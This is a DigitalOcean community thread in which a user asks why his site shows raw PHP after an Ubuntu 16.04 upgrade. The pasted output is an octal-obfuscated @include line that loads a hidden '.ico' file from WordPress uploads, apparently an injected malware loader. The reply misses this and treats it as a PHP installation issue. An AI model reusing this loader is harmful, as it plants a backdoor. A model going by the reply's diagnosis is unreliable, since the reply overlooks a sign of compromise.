Hi,
Bobby gave me the following link to do the upgrade: https://www.digitalocean.com/community/tutorials/how-to-upgrade-to-ubuntu-16-04-lts
After I completed all the commands which were stated in the link, I was able to upgrade our system to 16.04.6 LTS. However, when I tried to access our website, I was getting the following errors:
<?php /88d45/
@include “\057v\141r\057w\167w\057h\164m\154/\167p\055c\157n\164e\156t\057u\160l\157a\144s\057s\151t\145o\162i\147i\156-\167i\144g\145t\163/\056b\070a\0714\061a\143.\151c\157”;
/88d45/
Thanks, Carl
This textbox defaults to using Markdown to format your answer.
You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
Join our DigitalOcean community of over a million developers for free! Get help and share knowledge in Q&A, subscribe to topics of interest, and get courses and tools that will help you grow as a developer and scale your project or business.
Hi @adminClam,
Can you confirm you are trying to open the website in the browser? If so, it seems like your WebService can’t read the file. Please check if PHP is still installed by typing in
php -v
If it’s installed, I’ll recommend checking your WebService’s(Nginx/Apache) log or your php error log. The error should be displayed there. Once you have it, you should be able to act further upon it.
Having said that, if you are not sure about how to continue, post the error here and I’ll be happy to assist in pinpointing the issue.
Regards, KDSys